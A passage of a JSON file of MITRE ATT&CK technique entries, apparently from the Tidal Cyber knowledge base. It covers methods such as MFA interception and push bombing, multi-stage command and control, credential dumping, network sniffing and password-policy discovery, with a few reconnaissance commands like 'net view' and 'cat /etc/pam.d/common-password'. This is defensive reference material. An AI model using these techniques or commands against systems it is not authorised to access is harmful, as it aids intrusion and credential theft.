"description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Network"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f435a5ff-78d2-44de-b464-2b5528f94adc",
|
||
"value": "Modify System Image"
|
||
},
|
||
{
|
||
"description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. <sup>[[Mandiant M Trends 2011](https://app.tidalcyber.com/references/563be052-29ac-4625-927d-84e475ef848e)]</sup>\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). <sup>[[GCN RSA June 2011](https://app.tidalcyber.com/references/40564d23-b9ae-4bb3-8dd1-d6b01163a32d)]</sup>\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "600d45ec-cb9c-47b8-ae94-326471ebb007",
|
||
"value": "Multi-Factor Authentication Interception"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).<sup>[[Obsidian SSPR Abuse 2023](https://app.tidalcyber.com/references/7f28f770-ef06-5923-b759-b731ceabe08a)]</sup>\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”<sup>[[Russian 2FA Push Annoyance - Cimpanu](https://app.tidalcyber.com/references/ad2b0648-b657-4daa-9510-82375a252fc4)]</sup><sup>[[MFA Fatigue Attacks - PortSwigger](https://app.tidalcyber.com/references/1b7b0f00-71ba-4762-ae81-bce24591cff4)]</sup><sup>[[Suspected Russian Activity Targeting Government and Business Entities Around the Globe](https://app.tidalcyber.com/references/f45a0551-8d49-4d40-989f-659416dc25ec)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c0f2efd4-bfc8-43da-9859-14446fb8f289",
|
||
"value": "Multi-Factor Authentication Request Generation"
|
||
},
|
||
{
|
||
"description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1) in case the original first-stage communication path is discovered and blocked.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e54bdb49-6039-4048-9be6-657a7ff3e071",
|
||
"value": "Multi-Stage Channels"
|
||
},
|
||
{
|
||
"description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.<sup>[[NT API Windows](https://app.tidalcyber.com/references/306f7da7-caa2-40bf-a3db-e579c541eeb4)]</sup><sup>[[Linux Kernel API](https://app.tidalcyber.com/references/0a30d54e-187a-43e0-9725-3c80aa1c7619)]</sup> These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[CyberBit System Calls](https://app.tidalcyber.com/references/c13cf528-2a7d-4a32-aee2-db5db2f30298)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup> For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.<sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup><sup>[[GNU Fork](https://app.tidalcyber.com/references/c46331cb-328a-46e3-89c4-e43fa345d6e8)]</sup> This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.<sup>[[Microsoft Win32](https://app.tidalcyber.com/references/585b9975-3cfb-4485-a9eb-5eea337ebd3c)]</sup><sup>[[LIBC](https://app.tidalcyber.com/references/a3fe6ea5-c443-473a-bb13-b4fd8f4923fd)]</sup><sup>[[GLIBC](https://app.tidalcyber.com/references/75a6a1bf-a5a7-419d-b290-6662aeddb7eb)]</sup>\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.<sup>[[Microsoft NET](https://app.tidalcyber.com/references/b4727044-51bb-43b3-afdb-515bb4bb0f7e)]</sup><sup>[[Apple Core Services](https://app.tidalcyber.com/references/0ef05e47-1305-4715-a677-67f1b55b24a3)]</sup><sup>[[MACOS Cocoa](https://app.tidalcyber.com/references/6ada4c6a-23dc-4469-a3a1-1d3b4935db97)]</sup><sup>[[macOS Foundation](https://app.tidalcyber.com/references/ea194268-0a8f-4494-be09-ef5f679f68fe)]</sup>\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.<sup>[[Redops Syscalls](https://app.tidalcyber.com/references/dd8c2edd-b5ba-5a41-b65d-c3a2951d07b8)]</sup> Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "1120f5ec-ef1b-4596-8d8b-a3979a766560",
|
||
"value": "Native API"
|
||
},
|
||
{
|
||
"description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400) or exfiltration of data via [Traffic Duplication](https://app.tidalcyber.com/technique/c2fc2776-e674-46ff-8b8d-ecc90b8b1c26). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://app.tidalcyber.com/technique/8b744bfc-6bfb-45c5-8bb8-5b736ce7e634) to achieve the same goals.<sup>[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]</sup> In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Network"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "091282d8-ef05-487f-93aa-445efaeed71b",
|
||
"value": "Network Boundary Bridging"
|
||
},
|
||
{
|
||
"description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://app.tidalcyber.com/technique/8b0caea0-602e-4117-8322-b125150f5c2a).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e6c14a7b-1fb8-4557-83e7-7f5b89717311",
|
||
"value": "Network Denial of Service"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.<sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup> \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.<sup>[[apple doco bonjour description](https://app.tidalcyber.com/references/b8538d67-ab91-41c2-9cc3-a7b00c6b372a)]</sup><sup>[[macOS APT Activity Bradley](https://app.tidalcyber.com/references/7ccda957-b38d-4c3f-a8f5-6cecdcb3f584)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "5bab1234-8d1e-437f-88a0-d527b2dfc6cd",
|
||
"value": "Network Service Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. <sup>[[Wikipedia Shared Resource](https://app.tidalcyber.com/references/6cc6164e-84b3-4413-9895-6719248808fb)]</sup> <sup>[[TechNet Shared Folder](https://app.tidalcyber.com/references/80a9b92a-1404-4454-88f0-dd929a12e16f)]</sup> [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) can be used to query a remote system for available shared drives using the <code>net view \\\\\\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ac5e465f-466d-41e4-933a-04e2c861e820",
|
||
"value": "Network Share Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and/or [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) (AiTM) to passively gain additional knowledge about the environment.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup> Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup><sup>[[SpecterOps AWS Traffic Mirroring](https://app.tidalcyber.com/references/6ab2cfa1-230f-498e-8049-fcdd2f7296dd)]</sup> The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup>\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `monitor capture`.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[capture_embedded_packet_on_software](https://app.tidalcyber.com/references/5d973180-a28a-5c8f-b13a-45d21331700f)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "bbad213d-477d-43bf-9501-ad7d74bac323",
|
||
"value": "Network Sniffing"
|
||
},
|
||
{
|
||
"description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.<sup>[[Wikipedia OSI](https://app.tidalcyber.com/references/d1080030-12c7-4223-92ab-fb764acf111d)]</sup> Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup> Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.<sup>[[Microsoft ICMP](https://app.tidalcyber.com/references/47612548-dad1-4bf3-aa6f-a53aefa06f6a)]</sup> However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4aed5968-6380-47d2-bbd7-3a4d959089e1",
|
||
"value": "Non-Application Layer Protocol"
|
||
},
|
||
{
|
||
"description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088<sup>[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)]</sup> or port 587<sup>[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)]</sup> as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.<sup>[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "36850d17-a7d5-41ac-aa89-040b9c0b2b3f",
|
||
"value": "Non-Standard Port"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup> Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. <sup>[[Linux/Cdorked.A We Live Security Analysis](https://app.tidalcyber.com/references/f76fce2e-2884-4b50-a7d7-55f08b84099c)]</sup> Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. <sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>\n\nAdversaries may also abuse [Command Obfuscation](https://app.tidalcyber.com/technique/d8406198-626c-5659-945e-2b5105fcd0c9) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. <sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup> <sup>[[FireEye Revoke-Obfuscation July 2017](https://app.tidalcyber.com/references/e03e9d19-18bb-4d28-8c96-8c1cef89a20b)]</sup><sup>[[PaloAlto EncodedCommand March 2017](https://app.tidalcyber.com/references/069ef9af-3402-4b13-8c60-b397b0b0bfd7)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "046cc07e-8700-4536-9c5b-6ecb384f52b0",
|
||
"value": "Obfuscated Files or Information"
|
||
},
|
||
{
|
||
"description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.<sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup><sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup>\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a6740db8-10d6-4e5b-986b-7695d3fc4b85",
|
||
"value": "Obtain Capabilities"
|
||
},
|
||
{
|
||
"description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.<sup>[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)]</sup> These persistence mechanisms can work within Outlook or be used through Office 365.<sup>[[TechNet O365 Outlook Rules](https://app.tidalcyber.com/references/c7f9bd2f-254a-4254-8a92-a3ab02455fcb)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "db846575-a79b-4403-870d-5842be82001d",
|
||
"value": "Office Application Startup"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.<sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup> Credentials can then be used to perform [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "368f85f9-2b15-4732-80fe-087694eaf34d",
|
||
"value": "OS Credential Dumping"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> <sup>[[Superuser Linux Password Policies](https://app.tidalcyber.com/references/c0bbc881-594a-408c-86a2-211ce6279231)]</sup> <sup>[[Jamf User Password Policies](https://app.tidalcyber.com/references/aa3846fd-a307-4be5-a487-9aa2688d5816)]</sup>. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>\n\nPassword policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS <sup>[[AWS GetPasswordPolicy](https://app.tidalcyber.com/references/dd44d565-b9d9-437e-a31a-a52c6a21e3b3)]</sup>.",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
